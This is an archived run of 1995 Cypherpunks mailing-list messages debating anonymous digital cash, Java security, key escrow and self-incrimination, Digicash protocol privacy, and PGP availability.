involved in the use of cryptography -- that Mr. Barnes refers to as
"bad-mouthing cryptography."   We call it common sense.]

2.  Our support for Phil Zimmermann is based on long-term friendship and
personal principles, and on the fact that our business relies critically
on PGP.  Phil is one of my personal heroes as far as network politics
are concerned.  He's also not the kind of person who would let himself
be used for publicity purposes, and he's totally uninhibited about
criticizing us when he disagrees with us.  (Just ask him!)  He's also
given us some advice on the use of PGP in the next-generation FV system,
which WILL use cryptography, but in a manner you don't expect, and with
more secure key management than you'll find in any existing or publicly
proposed payment system. 

> I have, on several occasions, refuted his "infinite liability" rant,
> but it keeps on resurfacing. A few months ago, I wrote a short tech
> note on why this claim doesn't hold water. I thought I might stretch
> it into something longer, but other things have more urgently
> grabbed my attention. 

Yes, you wrote this theoretical treatise and proposed it as a refutation
to some specific arguments about Digicash.  It wasn't relevant to the
digicash argument, at least at the time, so I didn't pay a lot of
attention.  But basically, what your argument comes down to is that in
the event of a catastrophe, users can be told they have to sacrifice
their anonymity if they want to keep their cash.  As I have said all
along, the basic tradeoff is between anonymity and risk limitation in
the event of disaster recovery.  If the digital bank can, at its
pleasure, tell you that your anonymity has been revoked unless you want
to just say goodbye to your money, then I think the anonymity was a sham
in the first place.  (Who's using fig leafs here?)  First Virtual
transactions are also generally untraceable unlesss First Virtual
decides (or is court-ordered) to trace them.  At least we're up front
about it and don't call that level of privacy "anonymity".  Your
solution to the problem -- that anonymous cash has infinite liability --
basically comes down to letting the bank make you stop being anonymous
whenever it chooses.  That's our solution, too.
--------
Nathaniel Borenstein <nsb@fv.com>       | (Tense Hot Alien In Barn)
Chief Scientist, First Virtual Holdings | VIRTUAL YELLOW RIBBON:
FAQ & PGP key: nsb+faq@nsb.fv.com       | http://www.netresponse.com/zldf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 8 Dec 95 03:55:56 PST
To: cypherpunks@toad.com
Subject: Java musings
Message-ID: <9512081153.AA07233@all.net>
MIME-Version: 1.0
Content-Type: text


Excellent musings.  I just wanted to add something here.  There is a
fundamental issue with Java, and that is control:

	People in charge of organizations are responsible for what goes
on within them.  Without proper controls, it's impossible to carry out
that responsibility.

	The people who want us to use Java are asking us to give up
control over the programs run by our computers.  They tell us to trust
them because they say they have come up with a nearly fool-proof system
for doing this safely.

	- They don't claim it's really secure, they only say it is
		harder to abuse than a C++ program.  But nobody in their
		right mind would make it organizational policy to allow
		users to load and run C++ programs from over the Internet
		at the push of a button, and the removal of the particular
		things removed by Java are not adequate to justify this
		increased trust.
	- They won't back up their claims of security by assuming liability
		for resulting damages.  Their liability disclaimers tell
		us they think their security is worth exactly nothing.
		They are asking us to bet control of our IT on a product
		that they take no responsibility for.
	- They don't even provide us with the ability to control their
		product in the way we control other purchased software
		we place into our environments.  The inability to restrict
		which programs from which sources are run on our machines
		is a fundamental element of control.
	- Their product has been proven to be insecure in the past.  Several
		examples of its insecurities have been demonstrated, and many
		more have been pointed out.  There is essentially no counter
		point made by the Java supporters against these known defects.

	It seems to me that the loss of control resulting from the
widespread introduction of Java would make it unacceptable to business. 
The use of Java as it exists today violates the policies of many
businesses, and if their policies are ignored or changed to permit this
to happen, it weakens the overall control structure of the organization.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Tim Cook" <twcook@cts.com>
Date: Fri, 8 Dec 95 06:59:22 PST
To: cypherpunks@toad.com
Subject: Re: (Fwd) General release of Open Encryptor interface for PGP
Message-ID: <m0tO4HN-000V4hC@mailhub.cts.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks Jeff, but aimnet.com is not an anonymous server.
It dropped me as an unknown user.

Thanks
Tim Cook, Mindsource(tm) Librarian.
"The World is a Database - Mindsource is the Search Engine."
______________________________________________________________
M I N D S O U R C E (TM) I N F O R M A T I O N   N E T W O R K 
Send a blank Email to:mindsource@memo.net for full information
Visit our W3 Site http://www.ultimate.org/mindsource/main.html 
D E S T I N E D   FOR   G L O B A L   D I S T R I B U T I O N!  
Concept:"The Greatest Untapped Resource is Human Resource(TM)" 
Mindsource is a Reg. Trademark  Copyright(c)1995 by Mindsource





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ashfaq Rasheed <ashfaq@corp.cirrus.com>
Date: Fri, 8 Dec 95 08:44:21 PST
To: tcmay@mail.got.net
Subject: Re:Internet Stocks
Message-ID: <199512081645.AA18510@sunstorm.corp.cirrus.com>
MIME-Version: 1.0
Content-Type: text/plain



Can this be made a regular feature on the list? It will be helpful to discuss on the Internet companies are doing in the stock market. 

Also it would be interesting to see if any startups have a strong product to
survive in the market

Thanks!

Ashfaq




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 8 Dec 95 06:11:45 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Escrow expectations
Message-ID: <199512081417.JAA03121@homeport.org>
MIME-Version: 1.0
Content-Type: text



	If there is no expectation of privacy when a key is escrowed
with Bob, or my companies attorneys, then would there be any
expectation of privacy under Clipper?  Perhaps this is a powerful
argument we should expect to have used against us...

	"Your honor, we argue that in escrowing his keys with the US
government, the defendant should have known his communications could
be listened to, and thus has no expectation of privacy."


Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Fri, 8 Dec 95 06:33:20 PST
To: cypherpunks@toad.com
Subject: Java musings
In-Reply-To: <9512081153.AA07233@all.net>
Message-ID: <m0tO3sm-000G9UC@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


Frederick B. Cohen writes:

 > 	- They won't back up their claims of security by assuming liability
 > 		for resulting damages.  Their liability disclaimers tell
 > 		us they think their security is worth exactly nothing.
 > 		They are asking us to bet control of our IT on a product
 > 		that they take no responsibility for.

You haven't paid for liability claims.  Why do you think you should be
able to pursue them?  I don't know of *any* software which is
guaranteed.  But now you have the opportunity to change that.  Point
out all of Java's problems, and then sell them a solution that fixes
those problems.

 > 	- They don't even provide us with the ability to control their
 > 		product in the way we control other purchased software
 > 		we place into our environments.  The inability to restrict
 > 		which programs from which sources are run on our machines
 > 		is a fundamental element of control.

Again, sounds like something you could sell.  Sell an HTTP proxy that
only passes Java content if it's been signed by your company.  And, of
course, sell the matching signing service.

There are no problems, really, just business opportunities.

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 voice | Flushing, NY.  Not just a suburb,
Potsdam, NY 13676 | +1 315 268 9201 FAX   | it's a good idea in general.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: john.ellis@wmcmail.wmc.ac.uk
Date: Fri, 8 Dec 95 01:49:53 PST
To: drcharpe@hamlet.uncg.edu>
Subject: Re: PGP
Message-ID: <9511088184.AA818445140@wmcmail.wmc.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


     Does anyone have the source code for PGP (DOS) not Unix,
     


______________________________ Reply Separator _________________________________
Subject: PGP
Author:  Daniel 'genius' Charpentier <drcharpe@hamlet.uncg.edu> at internet
Date:    06/12/95 18:29


-----BEGIN PGP SIGNED MESSAGE-----
     
     
     
   I've tried to find out the answers to my
questions myself but I haven't been very successful. 
Actually, I haven't been successful at all.  First of all,
I've been using PGP on my computer but when I tried to port it 
over to my unix account it didn't work.  I took the source code 
and tried to compile it using the unix g++ compiler but it gave 
me all of these errors.  Where can I find PGP that is already 
compiled for unix or at the very least will compile for unix? 
Secondly, if I create a program that makes using PGP more
user friendly can I let other people have it ( for FREE )? 
Lastly, what is considered overkill with cryptography?
I don't believe anything is.  My programs accept what the user 
inputs for how large prime numbers should be ( my public
key programs ) but I make them able to accept values that go 
up to 30720 bits ( I don't believe a number can ever be large 
enough ).  You can never be to safe...never.
     
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
     
iQEVAwUBMMXVhDMGe42brZbVAQEo/Qf7BSshqKJAmxVzyGSyAp2Qkj+/dqh1Zon1 
xDqMnvU6ihLimHZ/uXGiQE2jM6N8FRbYu7psQ/iPJ+gX5/VKfrxlxjCfDM0Jx2s9 
vucgMQz1KYbELA8Fo1QUEsDuTMzJ80VoTicXfZZmILhr7cBJH4pHa5RgkgrS2Lun 
iodQ+F7BXdio86TnctQgoKJ+78qOYDuV4Vfha/a290ZoZmPRcqArYv7tU6X3KMjf 
DGxqgugiwpHnkTO1B9wypoePbbJZSNzFYYvZKMI8Ntg7yFkMl/lSxcLh6oYq0ACe 
R9NfZR9x11H/fIrn8HZlq0Q86OptWhZz53p77VNN+sVZJOktHJIWqg==
=WK6x
-----END PGP SIGNATURE-----
     
     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Oliver Huf <ohuf@relay.sedat.de>
Date: Fri, 8 Dec 95 00:33:58 PST
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Solution for US/Foreign Software?
In-Reply-To: <199512080313.TAA00782@ix2.ix.netcom.com>
Message-ID: <Pine.NXT.3.91.951208093359.27366F-100000@oe1>
MIME-Version: 1.0
Content-Type: text/plain



> or rational here.)  The issue is that, unless written very carefully,
> the crypto-less software is a "component of a cryptosystem",
> and therefore still requires permission to export.

Thanks for the hint.

Oli.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 8 Dec 95 09:50:28 PST
To: Nathaniel Borenstein <nsb+limbo@nsb.fv.com>
Subject: Re: More FUD from First Virtual
Message-ID: <m0tO6o4-00091AC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:51 AM 12/8/95 -0500, you wrote:
>Excerpts from mail.limbo: 7-Dec-95 More FUD from First Virtual Douglas
>Barnes@communiti (1157*)
>
>I *am* skeptical about the extent to which anonymous cash *can* succeed,

What can stop it?  What should stop it?


>but in point of fact I'd like to help.  I think society will be better
>off if one of the payment options is truly anonymous.  I think that
>level of privacy will inevitably carry a high surcharge, however, for
>reasons that I keep pointing out and you keep ignoring.

Well, maybe I haven't been following those reasons, but I see little or no
reason privacy should "inevitably carry a high surcharge."  If the relevant
encryptions had to be carried out with a pencil and a piece of paper, that
claim would make sense, but remember, we've got MICROPROCESSORS on our side!

I agree, I suppose, that there are definitely entities (read: governments)
which would WANT to prevent the use of anonymous cash, but I view them more
of an obstacle to be removed than a permanent bar.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Fri, 8 Dec 95 02:12:41 PST
To: john.ellis@wmcmail.wmc.ac.uk
Subject: Re: PGP
In-Reply-To: <9511088184.AA818445140@wmcmail.wmc.ac.uk>
Message-ID: <E0tNznx-0007jy-00@bescot.cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


>      Does anyone have the source code for PGP (DOS) not Unix,

You should be able to use http://www.pgp.net/pgp/ or ftp:ftp.pgp.net to find what you need - DOS is under pc ...

                                                                  dos directory
                                      DOS
   [1]Up to pc

Jul  6 15:03  Zip File         [2]pg262uis.zip  521Kb
Jul  6 13:37  Zip File         [3]pg262uix.zip  228Kb
Nov  7  1994  Zip File         [4]pgp262.zip  276Kb
May  9  1995  Zip File         [5]pgp262i.zip  272Kb
May  9  1995  Zip File         [6]pgp262is.zip  568Kb
Jul 16 13:21  Zip File         [7]pgp262ix.zip  419Kb
Apr  4  1995  Zip File         [8]pgp262s.zip  643Kb
Oct 19  1994  Zip File         [9]pgp26i.zip  251Kb
Oct 19  1994  Zip File         [10]pgp26is.zip  603Kb
Sep 19  1994  Zip File         [11]pgp26uis.zip  510Kb
May 11  1995  Zip File         [12]pgpmnu20.zip  45Kb
Sep 19  1994  Zip File         [13]pgpshe32.zip  108Kb
Sep 19  1994  Zip File         [14]pgs099e.zip  65Kb





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 8 Dec 95 07:29:40 PST
To: cypherpunks@toad.com
Subject: Re: Escrow expectations
Message-ID: <2.2b8.32.19951208153041.00687120@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:17 AM 12/8/95 -0500, Adam Shostack wrote:

>	"Your honor, we argue that in escrowing his keys with the US
>government, the defendant should have known his communications could
>be listened to, and thus has no expectation of privacy."

If Clipper were mandated you might be able to resist a prosecution for
"failure to file" keys or for double encrypting your transmissions if you
could prove that you were transmitting illegal messages or evidence of a
crime.  Just as those who possess illegal weapons are not required to
register them (self incrimination).  You have to be sure your traffic is
illegal though otherwise no protection.

DCF

"But if indecency is banned from the nets what will happen to the photos of
Clinton's face posted on www.whitehouse.gov?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Hittinger <bugs@ritz.mordor.com>
Date: Fri, 8 Dec 95 07:29:39 PST
To: cypherpunks@toad.com
Subject: Java musings
Message-ID: <199512081530.KAA26089@ritz.mordor.com>
MIME-Version: 1.0
Content-Type: text



I was starting to feel as if Java was going to be everything the hype was
cracking it up to be.

Then I saw Micro$oft jump on the Java bandwagon.  Could Java already be dead?

:-)

Regards,

Mark Hittinger
Netcom/Dallas
bugs@freebsd.netcom.com
bugs@ritz.mordor.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Fri, 8 Dec 95 07:47:50 PST
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <199512080554.AAA05788@opine.cs.umass.edu>
Message-ID: <Pine.BSF.3.91.951208104300.736A-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 8 Dec 1995, Futplex wrote:

> Black Unicorn writes:
> > Yes.  I have seen holdings which indicate that information given to an 
> > employer, where there was no obvious expection that it be kept 
> > confidential, estopped 4th amendment protections to its introduction when 
> > obtained without a warrant.
> [...and...]
> > Again, because of the nature of the relationship.  There is an 
> > expectation that a conversation with an attorney is one of the most 
> > private exchanges you can engage in.  As for rare exceptions, I'm not so 
> > sure I would term them rare.
> 
> What happens if I disclose a key to my employer's corporate law firm ?

The "key" here to the legal analysis is likely to be that the 
*employer's* law firm does not represent you and that the information 
disclosed is not privileged.  The law firm's duty is to represent the 
corporation, not you.  Certainly, such things as how you came to reveal 
it and what your position if the corporation could come into play, but in 
general, that firm is NOT your lawyer.


> Does that clearly lie one way or the other, or would it likely hinge upon 
> the conditions under which I came to reveal the key ?
> 
> -Futplex <futplex@pseudonym.com>

EBD

Not a lawyer on the Net, although I play one in real life.
********************************************************** 
Flame away! I get treated worse in person every day!! 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerry Whiting <jwhiting@igc.apc.org>
Date: Fri, 8 Dec 95 10:46:55 PST
To: cypherpunks@toad.com
Subject: The Elevator Problem
Message-ID: <199512081847.KAA25829@igc2.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain


A group of us have been wrestling with a problem and I'd like to ask for some 
outside help.  We've come to call it the Elevator Problem.

Alice and Bob want to establish a secret in from of Eve.  In other words, 
they want to agree on a secret key in an elevator full of Eve's.

We don't want the protocol to step on any existing patents (DH, HM, etc.).  
If the protocol takes numerous steps, that's OK because ultimately we'd like 
Alice's machine to contact Bob's, who could respond, and back and forth as 
often as needed.

We have also talked about a less than perfect solution IF we can establish 
mathmatically what the confidence level and risk factor are.  Alice and Bob 
might agree that the value of the secret is such that they can live with a 
1 in n probability that Eve too has the secret.

Shamir's 3 step seems close but I'm afraid we've been doing the blackboard 
talks so long that we're missing the solution.  IF THERE EVEN IS ONE.

thanks in advance,


Jerry Whiting
jwhiting@azalea.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Fricker <jfricker@vertexgrp.com>
Date: Fri, 8 Dec 95 10:41:02 PST
To: cypherpunks@toad.com
Subject: Anyone know of a white paper on security?
Message-ID: <199512081938.LAA01395@vertex.vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


    The question I'm seeking to answer is : 

What criteria should be used to determine whether a scripting language such as Java, LiveScript, etc. is secure?

There are obvious issues such as access to the file system but has anyone thought this all the way through and codified a white paper?

john.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Fri, 8 Dec 95 07:54:32 PST
To: cypherpunks@toad.com
Subject: Re: Escrow expectations
In-Reply-To: <2.2b8.32.19951208153041.00687120@panix.com>
Message-ID: <m0tO59L-000G9eC@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell writes:
 > At 09:17 AM 12/8/95 -0500, Adam Shostack wrote:
 > 
 > >	"Your honor, we argue that in escrowing his keys with the US
 > >government, the defendant should have known his communications could
 > >be listened to, and thus has no expectation of privacy."
 > 
 > If Clipper were mandated you might be able to resist a prosecution for
 > "failure to file" keys or for double encrypting your transmissions if you
 > could prove that you were transmitting illegal messages or evidence of a
 > crime.  Just as those who possess illegal weapons are not required to
 > register them (self incrimination).  You have to be sure your traffic is
 > illegal though otherwise no protection.

To bring two cypherpunks threads together:

That SHIT should be FUCK no DAMN problem ANAL whatsoever in a few SEX
months.

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 voice | Flushing, NY.  Not just a suburb,
Potsdam, NY 13676 | +1 315 268 9201 FAX   | it's a good idea in general.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 8 Dec 95 09:34:26 PST
To: Ashfaq Rasheed <ashfaq@corp.cirrus.com>
Subject: Re:Internet Stocks
Message-ID: <acedb6d70c021004c1c9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:45 PM 12/8/95, Ashfaq Rasheed wrote:
>Can this be made a regular feature on the list? It will be helpful to
>discuss on the Internet companies are doing in the stock market.
>
>Also it would be interesting to see if any startups have a strong product to
>survive in the market

It won't be a regular feature by me, that's for sure! What others write is
of course up to them.

As I said in my message, I'd gotten some queries in e-mail, enough to
indicate justification for one public message summarizing a bunch of
points. Especially seeing as how these stocks have been very much in the
news this week, and have been discussed on the list.

But this is not "StockPunks," so I don't plan to comment unless something
important comes up. Investors (and speculators) are well-served by various
news sources, including the "Wall Street Journal," which also carries at
least one great article per day, and sometimes even two.

A bonus URL for you folks: http://www.ai.mit.edu/stocks.html

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 8 Dec 95 08:02:45 PST
To: sameer <cypherpunks@toad.com
Subject: Re: the X.9 Electronic Payments ANSI standard
In-Reply-To: <199512080630.WAA17998@infinity.c2.org>
Message-ID: <9512081603.AA02769@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>The chair of the working group seems interesting
>in including anonymous token-based payment systems in the standard, "I
>see no reason, other than interest, for the group to avoid
>non-account-based payment systems, to complement the account-based
>payment systems that we are now in the process of standardizing."

I see a damn good reason. X.9 is meant to be fast tracking credit card
payment mechanisms. They are not meant to be going out solving every problem in 
the universe. They could attempt to standardise non account payment systems 
after they have done the problem they were given. 

	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Fri, 8 Dec 95 11:04:24 PST
To: cypherpunks@toad.com
Subject: Re: More FUD from First Virtual
Message-ID: <v02120d01acee261ab478@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain


[Remainder of Nat's largely inaccurate rant deleted]

> But basically, what your argument comes down to is that in
>the event of a catastrophe, users can be told they have to sacrifice
>their anonymity if they want to keep their cash.  As I have said all
>along, the basic tradeoff is between anonymity and risk limitation in
>the event of disaster recovery.

NB's errors and distortions are numerous, but for the sake of brevity
and topicality I've chosen this particular misconstruction of what
I've written as an exemplar.

In my proposed approach, users don't sacrifice one iota of privacy
when redeeming expired cash. When the user reveals blinding factors
on unspent cash, the bank gives the user new (blinded) cash in
exchange. No payer-payee relationship is revealed. This is the same
wrong argument you've made before. Try reading the (very short) note;
this point is made explicitly. I have no clue what Digicash is
actually doing in this regard, but one of their engineers alluded
to something along these lines at Crypto.

It is this systematic distortion of truth by at least two representatives
of First Virtual that has lead to this (highly intermittent) "vendetta".
I try not to feed the energy creatures, but this particular creature
and his minions are literally running around the country, spewing their
lies whenever they get the chance. When they slam cryptography in the
banking community, you can be assured they don't mention their charity
work for Phil, or how they really want to see anonymous systems some day.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 8 Dec 95 09:56:40 PST
To: cypherpunks@toad.com
Subject: GAK and Self-Incrimination?
Message-ID: <acedb98c0d0210046493@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Duncan Frissell wrote:

>At 09:17 AM 12/8/95 -0500, Adam Shostack wrote:
>
>>       "Your honor, we argue that in escrowing his keys with the US
>>government, the defendant should have known his communications could
>>be listened to, and thus has no expectation of privacy."
>
>If Clipper were mandated you might be able to resist a prosecution for
>"failure to file" keys or for double encrypting your transmissions if you
>could prove that you were transmitting illegal messages or evidence of a
>crime.  Just as those who possess illegal weapons are not required to
>register them (self incrimination).  You have to be sure your traffic is
>illegal though otherwise no protection.

Though I'm usually not too interested in smart-ass, overly cute,
interpretations of legal loopholes--having been burned by the tax protestor
arguments that the tax system is invalid because of definitions of money or
that Ohio never entered the Union legally, or somesuch--this whole escrow
thing has got me thinking.

Given that GAK means one never knows if the government is listening, could
a person claim protection against self-incrimination as a reason to not use
GAK, and get away with it? (This is different from the phone system, which
may also be tapped. The analogy would be the same if the government forced
one to pick a telephone it could tap over one it could not, which so far
has not been the case, but which soon may be if switching systems which are
not compliant with Digital Telephony Act provisions are shut down.)

Consider this hypo: I send an encrypted message to a partner in crime
containing plans for future crimes and descriptions of past crimes. I don't
GAK the message. The government prosecutes me under the Anti-Terrorism and
Child Protection Act of 1997.

My defense? That GAKKing the message would be tantamount to incriminating
myself, which the Fifth Amendment protects me against.

(The government might claim that this "tantamount" conclusion is specious,
that only with a valid court order could they open my traffic. I would
claim that this is suspect, citing the secret court (FISA) provisions, the
possible back doors in GAK (64 bits known to be breakable, according to
Clint Brooks of the government), and the general confusion about whether
opening one message exposes past traffic to reading. I think my lawyers
could make a convincing case that GAK will mean my words may be read by the
government, via multiple options.)

Comments?

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 8 Dec 95 11:50:12 PST
To: Mark Twain Ecash Support <daw@delhi.CS.Berkeley.EDU (David A Wagner)
Subject: Re: Still more on the Digicash protocol
Message-ID: <199512081948.LAA16066@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:26 12/8/95 -0600, Mark Twain Ecash Support wrote:
>DigiCash agrees that it is desirable to encrypt the payment request. The
>problem is how? You can't use the payor's public key, since the payor is
>anonymous to the payee. There are other, high overhead, protocols that might
>be used, but after taking MIM into account, securing the payment request
>from within Ecash while retaining acceptable latency is much harder to
>acomplish than one might think. 

Wouldn't a Diffie-Hellman key exchange work here?  Or is that too much overhead?


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 8 Dec 95 08:56:16 PST
To: cypherpunks@toad.com
Subject: BAR_tur
Message-ID: <199512081657.LAA09805@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-08-95. W$J:

   "Microsoft to Adopt Rival Tecnologies."

      Gates yawned, "its awakening a sleeping giant."

      "In a fight between a bear and an alligator, what
      determines the victor is the terrain," Andreesen
      shat. "What Microsoft just did is move onto our
      terrain."

      Ellison puked, "the Internet makes strange bedfellows."

      Schmidt shreiked, "Java moola."

   BAR_tur













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Twain Ecash Support <support@marktwain.com>
Date: Fri, 8 Dec 95 10:24:10 PST
To: daw@delhi.CS.Berkeley.EDU (David A Wagner)
Subject: Re: Still more on the Digicash protocol
Message-ID: <199512081825.MAA22557@admin.starnet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:17 PM 12/7/95 -0500, you wrote:

>Assume the attacker is not doing any traffic analysis.  The problem is
>that even then, the shop's identity (and product info, and payment amount,
>and bank ID, etc.) are still sent *in the clear* in the Digicash payment
>protocol.  Thus all those items can be correlated to the payee's identity:
>a complete loss of privacy for the shop.
>
>There's no need to send that payment info in the clear -- why not encrypt?

DigiCash agrees that it is desirable to encrypt the payment request. The
problem is how? You can't use the payor's public key, since the payor is
anonymous to the payee. There are other, high overhead, protocols that might
be used, but after taking MIM into account, securing the payment request
from within Ecash while retaining acceptable latency is much harder to
acomplish than one might think. 

The best solution at this time seems to be to use the already existing https
connection to transmit the payment request. The next version of Ecash will
offer this feature as an option to the user.




--Mark Twain Bank Ecash Support
  Ecash. The secure Internet payment system that protects your privacy.
  <http://www.marktwain.com/ecash.html>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Fri, 8 Dec 95 13:37:32 PST
To: cypherpunks@toad.com
Subject: NSA flying disk follow-up [Extremely Frivolous]
Message-ID: <v02120d07acee50acb4f2@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



I spoke with Dennis Cisco at the NSA today, and he is
unwilling to sell or otherwise distribute the NSA flying
disk promotional items "except at trade shows where we
are promoting our technology transfer program." Since they
are not planning on attending any such conferences in my
area in the near future, it is unlikely I'll be able to help
any of the (numerous) people who expressed an interest in
obtaining one of these fine flying disks.
(http://www.communities.com/foo/NSAfris.gif)

If you'd care to discuss this matter with Mr. Cisco yourself,
he can be reached at: (301) 688 0701. Note that this is in
Maryland. Also, the (301) 688 0606 number listed on the frisbee
seems to be either always busy or not answered -- I'm assuming
it's the # for the NSA tech transfer office.

Please let me know if any of you have better luck.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Kuchling <andrewk@dexotek.ca>
Date: Fri, 8 Dec 95 11:25:55 PST
To: cypherpunks@toad.com
Subject: Re: Python Cryptography Toolkit v1.0.0
In-Reply-To: <199512080747.CAA06243@opine.cs.umass.edu>
Message-ID: <9512081925.AA17370@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Futplex <futplex@pseudonym.com> wrote:
> (1) If you don't mind announcing that you've exported the software from
> Canada to the Netherlands, why not just put it up for ftp at a Canadian 
> site ?

	Simply because I don't have anywhere to put it.  This e-mail account
is at my workplace, and my employer doesn't run an anonymous FTP site.  I
also don't have an account with a local ISP, just because I haven't bothered
to get one yet.  Once I do, I'll certainly make the code available there.

> (2) Acronym overload: try to avoid calling your toolkit "PCT", since M$
> already has some security protocol called PCT....

	Yeah, I know; my code has been around for about 6 months, and I only
found out about MS's protocol a few weeks ago.  Hmmm... Python Cryptography
_Package_?  Kit?  Collection?  Stuff?  


	Andrew Kuchling 
	andrewk@cst.ca




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Fri, 8 Dec 95 05:45:48 PST
To: David A Wagner <daw@guaymas.CS.Berkeley.EDU>
Subject: Re: Still more on the Digicash protocol
Message-ID: <Pine.3.89.9512081312.A23124-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Dec 1995, David A Wagner wrote:

>Tough!?  It's trivial for an active attacker, in the stream cipher case.
>He just xors some bits: no clever cryptanalysis needed.  (Or did you mean
>it's tough to mount an active attack?  I agree: that requires significant
>knowledge or motivation.)

Exactly.. once you have an active attack set up, it's trivial, but setting
that up is quite hard. 

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 8 Dec 95 05:13:59 PST
To: cypherpunks@toad.com
Subject: @v@ XXX
Message-ID: <199512081315.OAA20949@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Wall Street Journal, 8 Dec 1995

On-Line Society Angered by Plan to Curb Content

By Jared Sandberg

The latest move in Congress to curb "indecent" material on the
Internet triggered outrage and scorn in cyberspace, as on-line
users decried it as censorship and plotted ways to overturn
it.

"Welcome to the age of electronic book burning," said Craig
Johnson, a consultant who worries that the term "indecent"
could be applied to literary works, publichealth and medical
exchanges, and serious discussion of AIDS and sexual behavior.

